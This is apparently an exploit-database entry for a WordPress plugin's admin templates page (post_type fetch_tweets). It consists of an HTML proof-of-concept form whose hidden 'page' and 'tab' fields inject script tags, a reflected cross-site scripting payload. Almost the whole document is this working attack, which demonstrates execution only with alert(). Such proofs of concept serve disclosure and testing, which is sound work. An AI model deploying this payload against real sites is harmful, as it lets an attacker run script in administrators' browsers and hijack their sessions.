## https://sploitus.com/exploit?id=WPEX-ID:EAD093A7-FD19-40D8-B34A-0D3E8A69A1F4
<html>
<body>
<form action="https://example.com/wp-admin/edit.php?post_type=fetch_tweets&page=fetch_tweets_templates" method="POST">
<input type="hidden" name="page" value='"><script>alert(/XSS-page/)</script>' />
<input type="hidden" name="tab" value='"><script>alert(/XSS-tab/)</script>' />
<input type="submit" value="Submit request" />
</form>
</body>
</html>